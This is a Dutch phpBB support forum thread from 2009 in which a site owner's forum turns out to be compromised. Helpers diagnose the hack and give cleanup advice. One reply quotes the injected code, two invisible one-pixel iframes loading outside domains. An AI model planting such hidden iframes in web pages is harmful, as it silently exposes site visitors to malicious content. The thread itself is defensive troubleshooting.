Pagina 1 van 1
phpBB Debug fouten, graag hulp gevraagt
Geplaatst: 13 mei 2009, 20:49
door tanger33
- Adres van je forum: http://www.fitness-health-center.com
Wanneer ontstond het probleem? Een paar uur na het aanmaken van het forum
phpBB versie: 3.0.4
Heb je onlangs iets veranderd aan je forum? Nee, het is vanzelf gebeurt
Wat is het probleem?
Beste mensen,
Sinds een paar uur geeft mijn forum de volgende fout(en) aan:
Ik heb niet aan het forum geknoeid dus vind het wel een beetje raar dat dit zomaar is gekomen.
PHP Notice: in file /includes/session.php on line 990: Cannot modify header information - headers already sent by (output started at /includes/hooks/index.php:251)
[phpBB Debug] PHP Notice: in file /includes/session.php on line 990: Cannot modify header information - headers already sent by (output started at /includes/hooks/index.php:251)
[phpBB Debug] PHP Notice: in file /includes/session.php on line 990: Cannot modify header information - headers already sent by (output started at /includes/hooks/index.php:251)
[phpBB Debug] PHP Notice: in file /includes/functions.php on line 3760: Cannot modify header information - headers already sent by (output started at /includes/hooks/index.php:251)
[phpBB Debug] PHP Notice: in file /includes/functions.php on line 3762: Cannot modify header information - headers already sent by (output started at /includes/hooks/index.php:251)
[phpBB Debug] PHP Notice: in file /includes/functions.php on line 3763: Cannot modify header information - headers already sent by (output started at /includes/hooks/index.php:251)
[phpBB Debug] PHP Notice: in file /includes/functions.php on line 3764: Cannot modify header information - headers already sent by (output started at /includes/hooks/index.php:251)
Ik zou het zeer op prijs stellen als iemand me hier uit kan helpen,
Vriendelijke groeten
Re: phpBB Debug fouten, graag hulp gevraagt
Geplaatst: 14 mei 2009, 09:32
door FreakyBlue
Als je je forum alleen hebt geïnstalleerd en echt geen enkele file hebt geëdit, zou je twee dingen kunnen doen:
- leeg je cache folder via ftp (laat alleen de bestanden index.htm en .htaccess staan!!!!)
- of overschrijf de forum files met een nieuwe verse phpbb3.0.4 versie (behalve je config.php in de rootfolder).
Re: phpBB Debug fouten, graag hulp gevraagt
Geplaatst: 14 mei 2009, 09:56
door tanger33
Beste,
hartelijk dank voor uw reactie,
Ik heb wel een nieuwe layout geinstalleerd en catogories,forums etc gemaakt (verder niks geknoied), worden deze dan verwijdert als ik de map cache leeg al (behalve 2 genoemde bestanden)
mvg,
Re: phpBB Debug fouten, graag hulp gevraagt
Geplaatst: 14 mei 2009, 10:01
door Pascal
Nee, de cache map is voor tijdelijke bestanden om je forum sneller te laden, als je deze verwijderd op die 2 bestanden na worden ze weer aangemaakt.
Re: phpBB Debug fouten, graag hulp gevraagt
Geplaatst: 14 mei 2009, 10:11
door tanger33
jammer het leek een goede oplosiing alleen heb ik mijn probleem behouden..
ik heb al eens eerder geprobeerd alle te wissen en een compleet nieuwe forum te instaleren maar dit probleem blijft voorkomen..
enig idee naar een andere oplossing ?
met vriendelijke groeten
Re: phpBB Debug fouten, graag hulp gevraagt
Geplaatst: 14 mei 2009, 10:16
door FreakyBlue
Heb je dit probleem ook als je gewoon alleen een forum installeert zonder de layout te editen?
Dus de banner, navigatiemenu, poll etc.
Re: phpBB Debug fouten, graag hulp gevraagt
Geplaatst: 14 mei 2009, 10:20
door tanger33
het zijn eigenlijk 2 losse delen, het forum zit ingebouwd in een frame met gekoppeld document (actief document frame)
de banner, pol etc zijn apart en hebben niets met het forum te maken.
Als u alleen het forum wilt zien kan dat via de volgende url:
http://www.fitness-health-center.com/forum
zoals u ziet ziet alles er opgeblazen uit en vergroot...
Re: phpBB Debug fouten, graag hulp gevraagt
Geplaatst: 14 mei 2009, 10:24
door FreakyBlue
Ik zal eerlijk zijn dat dit voor mij ook even puzzelen is. Staat er iets na ?> in deze file: /includes/hooks/index.php ?
Een spatie bijvoorbeeld?
Re: phpBB Debug fouten, graag hulp gevraagt
Geplaatst: 14 mei 2009, 10:34
door tanger33
Ik stel het zeer op prijs dat u de moeite neemt om mijhieruit te helpen, wat dat betreft is het support echt top !
ik kan helaas geen spatie of andere tekens na ?> vinden...
kan ik u helpen met de inloggegevens wachtwoorden oid ?
de hook.index ziet er zo uit:
Code: Selecteer alles
<?php
/**
*
* @package phpBB3
* @version $Id: index.php 8479 2008-03-29 00:22:48Z naderman $
* @copyright (c) 2007 phpBB Group
* @license http://opensource.org/licenses/gpl-license.php GNU Public License
*
*/
/**
* @ignore
*/
if (!defined('IN_PHPBB'))
{
exit;
}
/**
* phpBB Hook Class
* @package phpBB3
*/
class phpbb_hook
{
/**
* Registered hooks
*/
var $hooks = array();
/**
* Results returned by functions called
*/
var $hook_result = array();
/**
* internal pointer
*/
var $current_hook = NULL;
/**
* Initialize hook class.
*
* @param array $valid_hooks array containing the hookable functions/methods
*/
function phpbb_hook($valid_hooks)
{
foreach ($valid_hooks as $_null => $method)
{
$this->add_hook($method);
}
if (function_exists('phpbb_hook_register'))
{
phpbb_hook_register($this);
}
}
/**
* Register function/method to be called within hook
* This function is normally called by the modification/application to attach/register the functions.
*
* @param mixed $definition Declaring function (with __FUNCTION__) or class with array(__CLASS__, __FUNCTION__)
* @param mixed $hook The replacement function/method to be called. Passing function name or array with object/class definition
* @param string $mode Specify the priority/chain mode. 'normal' -> hook gets appended to the chain. 'standalone' -> only the specified hook gets called - later hooks are not able to overwrite this (E_NOTICE is triggered then). 'first' -> hook is called as the first one within the chain. 'last' -> hook is called as the last one within the chain.
*/
function register($definition, $hook, $mode = 'normal')
{
$class = (!is_array($definition)) ? '__global' : $definition[0];
$function = (!is_array($definition)) ? $definition : $definition[1];
// Method able to be hooked?
if (isset($this->hooks[$class][$function]))
{
switch ($mode)
{
case 'standalone':
if (!isset($this->hooks[$class][$function]['standalone']))
{
$this->hooks[$class][$function] = array('standalone' => $hook);
}
else
{
trigger_error('Hook not able to be called standalone, previous hook already standalone.', E_NOTICE);
}
break;
case 'first':
case 'last':
$this->hooks[$class][$function][$mode][] = $hook;
break;
case 'normal':
default:
$this->hooks[$class][$function]['normal'][] = $hook;
break;
}
}
}
/**
* Calling all functions/methods attached to a specified hook.
* Called by the function allowing hooks...
*
* @param mixed $definition Declaring function (with __FUNCTION__) or class with array(__CLASS__, __FUNCTION__)
* @return bool False if no hook got executed, true otherwise
*/
function call_hook($definition)
{
$class = (!is_array($definition)) ? '__global' : $definition[0];
$function = (!is_array($definition)) ? $definition : $definition[1];
if (!empty($this->hooks[$class][$function]))
{
// Developer tries to call a hooked function within the hooked function...
if ($this->current_hook !== NULL && $this->current_hook['class'] === $class && $this->current_hook['function'] === $function)
{
return false;
}
// Call the hook with the arguments attached and store result
$arguments = func_get_args();
$this->current_hook = array('class' => $class, 'function' => $function);
$arguments[0] = &$this;
// Call the hook chain...
if (isset($this->hooks[$class][$function]['standalone']))
{
$this->hook_result[$class][$function] = call_user_func_array($this->hooks[$class][$function]['standalone'], $arguments);
}
else
{
foreach (array('first', 'normal', 'last') as $mode)
{
if (!isset($this->hooks[$class][$function][$mode]))
{
continue;
}
foreach ($this->hooks[$class][$function][$mode] as $hook)
{
$this->hook_result[$class][$function] = call_user_func_array($hook, $arguments);
}
}
}
$this->current_hook = NULL;
return true;
}
$this->current_hook = NULL;
return false;
}
/**
* Get result from previously called functions/methods for the same hook
*
* @param mixed $definition Declaring function (with __FUNCTION__) or class with array(__CLASS__, __FUNCTION__)
* @return mixed False if nothing returned if there is no result, else array('result' => ... )
*/
function previous_hook_result($definition)
{
$class = (!is_array($definition)) ? '__global' : $definition[0];
$function = (!is_array($definition)) ? $definition : $definition[1];
if (!empty($this->hooks[$class][$function]) && isset($this->hook_result[$class][$function]))
{
return array('result' => $this->hook_result[$class][$function]);
}
return false;
}
/**
* Check if the called functions/methods returned something.
*
* @param mixed $definition Declaring function (with __FUNCTION__) or class with array(__CLASS__, __FUNCTION__)
* @return bool True if results are there, false if not
*/
function hook_return($definition)
{
$class = (!is_array($definition)) ? '__global' : $definition[0];
$function = (!is_array($definition)) ? $definition : $definition[1];
if (!empty($this->hooks[$class][$function]) && isset($this->hook_result[$class][$function]))
{
return true;
}
return false;
}
/**
* Give actual result from called functions/methods back.
*
* @param mixed $definition Declaring function (with __FUNCTION__) or class with array(__CLASS__, __FUNCTION__)
* @return mixed The result
*/
function hook_return_result($definition)
{
$class = (!is_array($definition)) ? '__global' : $definition[0];
$function = (!is_array($definition)) ? $definition : $definition[1];
if (!empty($this->hooks[$class][$function]) && isset($this->hook_result[$class][$function]))
{
$result = $this->hook_result[$class][$function];
unset($this->hook_result[$class][$function]);
return $result;
}
return;
}
/**
* Add new function to the allowed hooks.
*
* @param mixed $definition Declaring function (with __FUNCTION__) or class with array(__CLASS__, __FUNCTION__)
*/
function add_hook($definition)
{
if (!is_array($definition))
{
$definition = array('__global', $definition);
}
$this->hooks[$definition[0]][$definition[1]] = array();
}
/**
* Remove function from the allowed hooks.
*
* @param mixed $definition Declaring function (with __FUNCTION__) or class with array(__CLASS__, __FUNCTION__)
*/
function remove_hook($definition)
{
$class = (!is_array($definition)) ? '__global' : $definition[0];
$function = (!is_array($definition)) ? $definition : $definition[1];
if (isset($this->hooks[$class][$function]))
{
unset($this->hooks[$class][$function]);
if (isset($this->hook_result[$class][$function]))
{
unset($this->hook_result[$class][$function]);
}
}
}
}
?>
Re: phpBB Debug fouten, graag hulp gevraagt
Geplaatst: 14 mei 2009, 10:39
door FreakyBlue
Dit lijkt hetzelfde en is niet positief
http://www.phpbb.com/community/viewtopi ... p#p9233515
Met andere woorden, iemand probeert de server te hacken.
Re: phpBB Debug fouten, graag hulp gevraagt
Geplaatst: 14 mei 2009, 12:26
door Derky
Dit wordt bovenaan het forum gezet:
Code: Selecteer alles
<iframe src="http://nipkelo.net/?click=11C6C51" width=1 height=1 style="visibility:hidden;position:absolute"></iframe><iframe src="http://brugeni.net/?click=2C2C59" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
Verwijder het bestand:
/includes/hooks/index.php
Download een
schone installatie van phpBB3 en haal daar dat zelfde bestandje uit en upload het.
Re: phpBB Debug fouten, graag hulp gevraagt
Geplaatst: 14 mei 2009, 12:56
door tanger33
YESSS hartelijk bedankt voor alle medewerking en hulp !
de oplossing kwam van Derky:
Verwijder het bestand: /includes/hooks/index.php
Download een schone installatie van phpBB3 en haal daar dat zelfde bestandje uit en upload het.
FreakyBlue, dat iemand mijn server/forum wil hacken wat kan ik er tegen doen ?
ik heb niet veel verstand van uploaden van mods en dergelijke...
Als ik mijn website open, zie ik linksonder allemaal rare websites downloaden (xbox... smart-phone-revieuws, online-wedding planner... en nog een paar) hoe krijg ik dat weg...
mvg
Re: phpBB Debug fouten, graag hulp gevraagt
Geplaatst: 14 mei 2009, 14:42
door tanger33
naaaaah was net blij dat het opgelost was, kan ik weer van voor af aan beginnen, de oplossign van Derky was dus maar tijdelijk
.....
Re: phpBB Debug fouten, graag hulp gevraagt
Geplaatst: 14 mei 2009, 14:50
door Pascal
Zorg ervoor dat virusen, trojans van je pc weg zijn, verander alle wachtwoorden etc

Re: phpBB Debug fouten, graag hulp gevraagt
Geplaatst: 14 mei 2009, 15:02
door tanger33
ga vanavond de virsuscanner aanzetten, wat is de volgende stap hierna ?
alhoewel ik niet zeker ben dat dit de opslossing is, volgens mij ligt het aan mijn phpbb software
ik wil niet graag weer alle gemaakte catogorien/forums aanmaken

Re: phpBB Debug fouten, graag hulp gevraagt
Geplaatst: 14 mei 2009, 15:07
door Pascal
Zolang jij de database behoud, hou je alles berichten, forums, leden en etc.
Ik vermoed dat iemand een keylogger op jouw pc heeft gezet, of in ieder geval andere malware.
al gedaan?
1) Save a copy of the files (simply create a local copy of the files on the server).
2) Save a copy of the database.
3) Save the server access logs for the time of the hack (they may be available in the 'logs' directory on the server, in your host's control panel or only by request directly from your host).
Re: phpBB Debug fouten, graag hulp gevraagt
Geplaatst: 14 mei 2009, 15:24
door tanger33
hij is nu bezig met scannen en heeft al zeker ruim 90 grote bedreigingen gevonden
als hij klaar is upload ik het complete forum toch maar weer... naar uw mening zou het dan opgelost moeten zijn, ik hoop dat u gelijk heeft

Re: phpBB Debug fouten, graag hulp gevraagt
Geplaatst: 14 mei 2009, 15:59
door Jim
Wat er gebeurd is dat je gehackt word, en dat er iemand is die continue bestanden aanpast en er gevaarlijke code inzet. Doe wat Pascal zei om alle informatie over de hack op te zoeken.
Meld dan je probleem in de phpBB.com
Incident tracker, en dan zoeken zij het mogelijke probleem uit.
Re: phpBB Debug fouten, graag hulp gevraagt
Geplaatst: 14 mei 2009, 16:08
door Pascal
Wat je vooral moet doen is voorzichtig te werk gaan, Noteer alles wat verdacht is, welke tijd etc.
Als je weet dat alles weg is van de hacker/hackster verander dan al je wachtwoorden, zelfs van phpbb.nl en je msn/e-mail sowieso alles waar je nog deze week voor moest in loggen. Geef de dader
geen kans.
Het klinkt mischien heel erg dom, maar toch trappen er nog steeds mensen in, en denken dat alles zomaar weer veilig is, sowieso raad ik het aan om deze maand super alert te zijn
